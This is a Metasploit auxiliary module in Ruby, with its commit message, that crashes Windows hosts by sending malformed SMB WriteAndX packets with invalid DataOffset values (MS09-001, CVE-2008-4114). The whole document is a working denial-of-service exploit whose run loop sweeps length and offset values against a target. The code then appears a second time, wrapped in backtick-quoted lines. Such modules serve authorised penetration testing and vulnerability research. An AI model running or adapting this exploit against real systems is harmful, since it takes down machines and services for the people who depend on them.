metasploit-framework/modules/auxiliary/dos/windows/smb/ms09_001_write.rb

class Metasploit3 < Msf::Auxiliary

    include Msf::Exploit::Remote::SMB

    def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
			'Description'    => %q{
				This module exploits a denial of service vulnerability in the
			SRV.SYS driver of the Windows operating system.
			},

			'Author'         => [ 'j.v.vallejo[at]gmail.com' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 6022 $',
        	'References' => 
				[
					['MSB', 'MS09-001'],
					['CVE', '2008-4114'],
					['BID', '31179'],
				]))
	end


	def send_smb_pkt(dlenlow, doffset,fillersize)

		connect()
		smb_login()

		pkt = CONST::SMB_CREATE_PKT.make_struct
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807

		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

		pkt['Payload']['SMB'].v['WordCount'] = 24

		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileNameLen'] = 14
		pkt['Payload'].v['CreateFlags'] = 0x16
		pkt['Payload'].v['AccessMask'] = 0x2019f  # Maximum Allowed
		pkt['Payload'].v['ShareAccess'] = 7
		pkt['Payload'].v['CreateOptions'] = 0x400040
		pkt['Payload'].v['Impersonation'] = 2       
		pkt['Payload'].v['Disposition'] = 1
		pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"


		simple.client.smb_send(pkt.to_s)
		ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)

		pkt = CONST::SMB_WRITE_PKT.make_struct
		data_offset = pkt.to_s.length - 4
		filler = Rex::Text.rand_text(fillersize)

		pkt['Payload']['SMB'].v['Signature1']=0xcccccccc
		pkt['Payload']['SMB'].v['Signature2']=0xcccccccc
		pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
		pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
		pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
		pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
		pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
		pkt['Payload']['SMB'].v['Flags1'] = 0x18
		pkt['Payload']['SMB'].v['Flags2'] = 0xc807
		pkt['Payload']['SMB'].v['WordCount'] = 14
		pkt['Payload'].v['AndX'] = 255
		pkt['Payload'].v['AndXOffset'] = 0xdede
		pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
		pkt['Payload'].v['Offset'] = 0
		pkt['Payload'].v['Reserved2'] = -1
		pkt['Payload'].v['WriteMode'] = 8
		pkt['Payload'].v['Remaining'] = fillersize
		pkt['Payload'].v['DataLenHigh'] = 0
		pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
		pkt['Payload'].v['DataOffset'] = doffset #<====
		pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
		pkt['Payload'].v['ByteCount'] = fillersize#<====
		pkt['Payload'].v['Payload'] = filler

		simple.client.smb_send(pkt.to_s)
	end

	def run

		print_line("Attempting to crash the remote host...")
		k=72
		j=0xffff
		while j>10000
			i=0xffff
			while i>10000
				begin
					print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
					send_smb_pkt(i,j,k)
				rescue
					print_line("rescue")
				end
				i=i-10000
			end
			j=j-10000
		end
	end

end
Adds coverage for http://marc.info/?l=bugtraq&m=122150111708026&w=2 git-svn-id: file:///home/svn/framework3/trunk@6319 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-08 08:09:40 +00:00			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Exploit::Remote::SMB`

			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',`
			`'Description' => %q{`
			`This module exploits a denial of service vulnerability in the`
			`SRV.SYS driver of the Windows operating system.`
			`},`

			`'Author' => [ 'j.v.vallejo[at]gmail.com' ],`
			`'License' => MSF_LICENSE,`
			`'Version' => '$Revision: 6022 $',`
			`'References' =>`
			`[`
			`['MSB', 'MS09-001'],`
			`['CVE', '2008-4114'],`
			`['BID', '31179'],`
			`]))`
			`end`


			`def send_smb_pkt(dlenlow, doffset,fillersize)`

			`connect()`
			`smb_login()`

			`pkt = CONST::SMB_CREATE_PKT.make_struct`
			`pkt['Payload']['SMB'].v['Flags1'] = 0x18`
			`pkt['Payload']['SMB'].v['Flags2'] = 0xc807`

			`pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i`
			`pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i`
			`pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i`
			`pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i`

			`pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX`

			`pkt['Payload']['SMB'].v['WordCount'] = 24`

			`pkt['Payload'].v['AndX'] = 255`
			`pkt['Payload'].v['AndXOffset'] = 0xdede`
			`pkt['Payload'].v['FileNameLen'] = 14`
			`pkt['Payload'].v['CreateFlags'] = 0x16`
			`pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed`
			`pkt['Payload'].v['ShareAccess'] = 7`
			`pkt['Payload'].v['CreateOptions'] = 0x400040`
			`pkt['Payload'].v['Impersonation'] = 2`
			`pkt['Payload'].v['Disposition'] = 1`
			`pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"`


			`simple.client.smb_send(pkt.to_s)`
			`ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)`

			`pkt = CONST::SMB_WRITE_PKT.make_struct`
			`data_offset = pkt.to_s.length - 4`
			`filler = Rex::Text.rand_text(fillersize)`

			`pkt['Payload']['SMB'].v['Signature1']=0xcccccccc`
			`pkt['Payload']['SMB'].v['Signature2']=0xcccccccc`
			`pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i`
			`pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i`
			`pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i`
			`pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i`
			`pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX`
			`pkt['Payload']['SMB'].v['Flags1'] = 0x18`
			`pkt['Payload']['SMB'].v['Flags2'] = 0xc807`
			`pkt['Payload']['SMB'].v['WordCount'] = 14`
			`pkt['Payload'].v['AndX'] = 255`
			`pkt['Payload'].v['AndXOffset'] = 0xdede`
			`pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']`
			`pkt['Payload'].v['Offset'] = 0`
			`pkt['Payload'].v['Reserved2'] = -1`
			`pkt['Payload'].v['WriteMode'] = 8`
			`pkt['Payload'].v['Remaining'] = fillersize`
			`pkt['Payload'].v['DataLenHigh'] = 0`
			`pkt['Payload'].v['DataLenLow'] = dlenlow #<==================`
			`pkt['Payload'].v['DataOffset'] = doffset #<====`
			`pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====`
			`pkt['Payload'].v['ByteCount'] = fillersize#<====`
			`pkt['Payload'].v['Payload'] = filler`

			`simple.client.smb_send(pkt.to_s)`
			`end`

			`def run`

			`print_line("Attempting to crash the remote host...")`
			`k=72`
			`j=0xffff`
			`while j>10000`
			`i=0xffff`
			`while i>10000`
			`begin`
			`print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")`
			`send_smb_pkt(i,j,k)`
			`rescue`
			`print_line("rescue")`
			`end`
			`i=i-10000`
			`end`
			`j=j-10000`
			`end`
			`end`

			`end`